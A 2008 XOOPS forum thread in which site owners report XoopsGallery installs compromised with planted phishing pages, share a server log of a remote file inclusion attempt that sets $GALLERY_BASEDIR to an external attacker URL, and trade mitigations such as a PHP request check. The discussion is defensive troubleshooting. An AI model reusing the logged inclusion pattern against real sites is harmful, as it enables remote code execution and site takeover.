xoops forums

Northern

Just can't stay away
Posted on: 2008/1/9 22:24
Northern
Northern (Show more)
Just can't stay away
Posts: 420
Since: 2004/12/26
#1

XoopsGallery Easly Hacked

I just got done removing 8 phishing site out of a single xoopsgallery folder, these little sites are like ticks.
all over the place in oddball places and not all of them seemed what they were.

I went to www.xoopsgallery.org but they seen to be closed or down at this time, as it was yesterday. and the day prior.

I would advise you to check your xoopsgallery module, look throught all folders and look for a all CAPS ( all upper case LETTERED ) folder, that would be the easiest way to find them.


This would be a wise thing to do sence ive just finished with the 4th xoopsgallery with this problem in under 2 weeks. none of the saiute are on the same servers or hosts, the version of XOOPS gallery was 3.3.3.7, 3.3.3.9, and 2.1

Flag it, bug it, report it, what ever you like, but its come apparent that theres a problem.


Marc.

BlueStocking

Home away from home
Posted on: 2008/1/9 22:57
BlueStocking
BlueStocking (Show more)
Home away from home
Posts: 1191
Since: 2007/2/16
#2

Re: XoopsGallery Easly Hacked

TO:
QuarantinedModules

@Irmtfan, D. J.
I have NOT removed it from the SourceForge list. That is for your determination. Please let me know what you do.

Thanks,

QUESTION: http://www.dhps.ylc.edu.tw/~demo/x96/ ... ileup/view_file.php?fsn=3 should be warned. I do not speak the language. (Chinese)

Is this the same module that Northern just reported on?

BS
https://xoops.org/modules/repository .. It is time to get involved - XOOPS.ORG

Northern

Just can't stay away
Posted on: 2008/1/10 0:34
Northern
Northern (Show more)
Just can't stay away
Posts: 420
Since: 2004/12/26
#3

Re: XoopsGallery Easly Hacked

Quote:

BlueStocking wrote:
TO:
QuarantinedModules

@Irmtfan, D. J.
I have NOT removed it from the SourceForge list. That is for your determination. Please let me know what you do.



From the looks of things in xoopsinfo< click the link. the Xoopsgallery has fallen into disrepair and is nologer.
its now a orphin. along with the websites .org,.com

I tried to contact Glen via email but i get my message back in under 2 sec. lol.


Quote:

QUESTION: http://www.dhps.ylc.edu.tw/~demo/x96/ ... ileup/view_file.php?fsn=3 should be warned. I do not speak the language. (Chinese)

Is this the same module that Northern just reported on?

BS



from the looks of the download file ( Xoopsgallery-1_3_3_7.zip ) its the same module.

Update:
most common ways for a phishing site to access your site is.
1. search box
2. javascript-from faulty html
3. faulty html


now if you noticed, all version of xoopsgallery have there own search box in the index page. Ive just removed the search form in the templates, and cmod ( 444 ) the search.php file. the hide the search opp in the xoops_version.php.

this is not a fix, but to help elemanate the problem, ive still got alot of source checking to do.

EastEnd99

Just popping in
Posted on: 2008/1/10 13:45
EastEnd99
EastEnd99 (Show more)
Just popping in
Posts: 1
Since: 2005/9/4 1
#4

Re: XoopsGallery Easly Hacked

This is a (sanitized) messages log from my webserver:
Jan  6 18:06:47 httpdPHP Warning:  main(): URL file-access is disabled in the server configuration in /..../modules/xoopsgallery/init_basic.php on line 83
Jan  6 18
:06:47 httpdPHP Warning:  main(http://kamekfm.org/test.txt???platform/fs_unix.php): failed to open stream: no suitable wrapper could be found in ../modules/xoopsgallery/init_basic.php on line 83
Jan  6 18:06:47 httpdPHP Fatal error:  main(): Failed opening required 'http://kamekfm.org/test.txt???platform/fs_unix.php' (include_path='.:/usr/share/pear-addons:/usr/share/pear'in ../modules/xoopsgallery/init_basic.php on line 83


Line 83 of init_basic.php shows the $GALLERY_BASEDIR variable is replaced by an external URL at runtime. These external references vary each time. My knowledge of PHP is limited: I cannot figure out which code is responsible for the value of this variable at runtime. I am stuck.

Am I looking at the same hack situation?
If it is: The hack does not seem to have any consequences: I can not find strange files inside the xoopsgallery directory structure. May be turning off URL file-access in the servers PHP configuration disables the hack. Other posiblity may be the hack check in each php file should be extended (it validates empty $GALLERY_BASEDIR variables) to make sure it is pointing to the local XOOPS installation.

If I can be of any help, please let me know.

EE99

deano42

Just popping in
Posted on: 2008/1/11 23:55
deano42
deano42 (Show more)
Just popping in
Posts: 13
Since: 2006/4/26
#5

Re: XoopsGallery Easly Hacked

I've had the same issue this week, does anyone know where you can get the latest version of XOOPS Gallery now that the site is down? I have some repairing to do...

Thanks

Dean

script_fu

Friend of XOOPS
Posted on: 2008/1/12 6:27
script_fu
script_fu (Show more)
Friend of XOOPS
Posts: 1494
Since: 2002/12/27
#6

Re: XoopsGallery Easly Hacked

The best solution is not to use the module at all.

Try one that a dev still supports...

example

http://www.zoullou.net/

MadFish

Friend of XOOPS
Posted on: 2008/1/12 6:46
MadFish
MadFish (Show more)
Friend of XOOPS
Posts: 1056
Since: 2003/9/27
#7

Re: XoopsGallery Easly Hacked

XoopsGallery was well maintained for years, it is a shame it if it is not maintained anymore.

This kind of thing is why XOOPS needs to designate some 'core modules', that will give users (especially business) some assurance of ongoing support.

bubuche93

Just popping in
Posted on: 2008/1/12 15:01
bubuche93
bubuche93 (Show more)
Just popping in
Posts: 25
Since: 2006/11/19
#8

Re: XoopsGallery Easly Hacked

is XOOPS gallery the same as xcgallery?

pjeutr

Just popping in
Posted on: 2008/1/12 21:07
pjeutr
pjeutr (Show more)
Just popping in
Posts: 2
Since: 2005/11/8
#9

Re: XoopsGallery Easly Hacked

Try adding the following at the top of init_basic.php
Seems to work for me, dunno why it should be possible that the base base can be a url.

// Hack prevention.
if (!empty($_REQUEST["GALLERY_BASEDIR"])) {
error_log("Security violation\n" .$_REQUEST["GALLERY_BASEDIR"]);
exit;
}

BlueStocking

Home away from home
Posted on: 2008/1/12 21:15
BlueStocking
BlueStocking (Show more)
Home away from home
Posts: 1191
Since: 2007/2/16
#10

Re: XoopsGallery Easly Hacked

SEE News report

http://codex.gallery2.org/Main_Page

http://codex.gallery2.org/Gallery2ownload#Packages

http://codex.gallery2.org/Integration
SEE: [XOOPS Download CMS/Portal alpha G2.0(.x) greyhair]

Maybe the link above will help. I am not a module developer so I would not know for certain but it appears XOOPSGallery 2 was designed on this platform, so maybe you or someone will re-xoopsify it.

Sidenote: Beautiful Wiki support.
https://xoops.org/modules/repository .. It is time to get involved - XOOPS.ORG